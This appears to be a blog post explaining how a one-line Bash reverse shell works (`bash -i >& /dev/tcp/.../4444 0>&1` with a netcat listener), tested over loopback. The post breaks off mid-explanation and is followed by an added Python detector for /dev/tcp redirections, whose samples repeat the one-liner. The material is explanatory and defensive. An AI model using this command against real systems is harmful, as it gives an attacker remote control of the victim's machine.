# One Line Reverse Shell in Bash – Hypothetical Me

Yesterday I saw a message from Bryan Brake on one of the BrakeSec Slack channels:

I knew that it's a reverse shell - a tool that connects the target computer back to you (hence the 'reverse') and then allows you to execute commands on that machine ('shell').

Skip to the Summary if you just want the answer.

## Setup

Bryan then mentioned that this command is supposed to be used with a netcat (`nc` or `ncat`, depending on your version) listening on port 4444 of the computer with IP 192.168.8.198:

```
$ nc -v -n -l -p 4444
```

I didn't want to run my shell over the open Internet, so I replaced 192.168.8.198 with the loopback IP 127.0.0.1:

```
# (1) run in the first terminal
# -n - do not try to inverse lookup IPs that connect to us
$ nc -v -n -l -p 4444
```

```
$ bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
```

And it works! Now, let's figure it out one piece at a time, starting from `bash -i`.

## Interactive Bash

According to the Bash man page (`man bash`), option `-i` means that we're starting an "interactive shell." The Invocation section then explains that a non-interactive shell will not execute its startup files: all those /etc/profile, ~/.profile, ~/.bashrc, etc. It also says that Bash automatically starts in this interactive mode when there are no non-option arguments (unless you pass a command to execute with `-c`) and when its standard input and error streams are both connected to terminals.

So why would we want an interactive shell? I think, just because it will be more like the shells that we're used to - with default aliases, a correctly set PATH, and a prompt.

Ok, and why isn't it interactive in our case? Those angle brackets in our command redirect the standard streams, which probably makes Bash think that it isn't running in a terminal.

Redirection is a feature available in most shells that allows you to change where a command's output goes and where its input comes from. For example, this will write the directory listing to the dir.list file:

```
$ ls -l > dir.list
```

A quick search through the good old man page reveals that `>& target` is just an alternative form of `&> target`, which in turn means `1> target 2>&1` - redirect both the standard output and standard error streams to the target.

At this point, I made a mistake thinking that `>& /dev/tcp/127.0.0.1/4444` is merely a redirect of stdout and stderr to some special file /dev/tcp/127.0.0.1/4444 that automatically opens a TCP connection.
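The redirection forms the post takes apart (`>&`, its `1> target 2>&1` expansion, and the `0>&1` that wires stdin back to the same place) are also what a defender can key on in process-execution telemetry. The following Python is an added example, not code from the post: it parses a command line for redirections aimed at `/dev/tcp` or `/dev/udp` and rates it higher only when stdin is wired to the same socket as stdout; the sample command lines and the `time.example` host are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional
# Constructed sample process command lines (as an EDR or auditd execve feed might
# record them): the post's one-liner, its spelled-out equivalent, two benign uses.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1",
    "bash -i 1> /dev/tcp/192.168.8.198/4444 2>&1 0>&1",
    "ls -l > dir.list",
    "bash -c 'cat < /dev/tcp/time.example/13'",
]
# A redirection whose target is a /dev/tcp or /dev/udp pseudo-file.
DEVNET_RE = re.compile(
    r"(?P<fd>\d*)(?P<op>&>>?|>&|<>|>>|>|<)\s*"
    r"/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s'\"]+)/(?P<port>\d+)"
)
# stdin duplicated from another fd (0>&1, 0<&1, <&1): bash then reads its
# commands from wherever that descriptor points.
STDIN_DUP_RE = re.compile(r"(?:^|\s)(?:0>&|0<&|<&)(?P<src>\d+)(?=\s|$)")

@dataclass
class Finding:
    cmdline: str
    targets: list  # [(fds, proto, host, port), ...]
    stdin_wired: bool  # does the shell read its input from the socket?

def fds_for(fd: str, op: str) -> frozenset:
    """Descriptors a redirection applies to, following bash's defaults."""
    if fd:
        return frozenset({int(fd)})
    if op in ("&>", "&>>", ">&"):
        return frozenset({1, 2})  # stdout and stderr together
    return frozenset({0}) if op in ("<", "<>") else frozenset({1})

def analyze(cmdline: str) -> Optional[Finding]:
    targets, socket_fds = [], set()
    for m in DEVNET_RE.finditer(cmdline):
        fds = fds_for(m["fd"], m["op"])
        socket_fds |= fds
        targets.append((sorted(fds), m["proto"], m["host"], int(m["port"])))
    if not targets:
        return None
    stdin_wired = 0 in socket_fds or any(
        int(d["src"]) in socket_fds for d in STDIN_DUP_RE.finditer(cmdline))
    return Finding(cmdline, targets, stdin_wired)

def severity(f: Finding) -> str:
    # "high" only when bash both reads from and writes to the socket.
    outbound = any(1 in fds for fds, *_ in f.targets)
    return "high" if f.stdin_wired and outbound else "medium"
```

A read-only use such as the `cat < /dev/tcp/...` sample still surfaces, but at the lower rating, so the rule separates plain network reads from a shell driven over the connection.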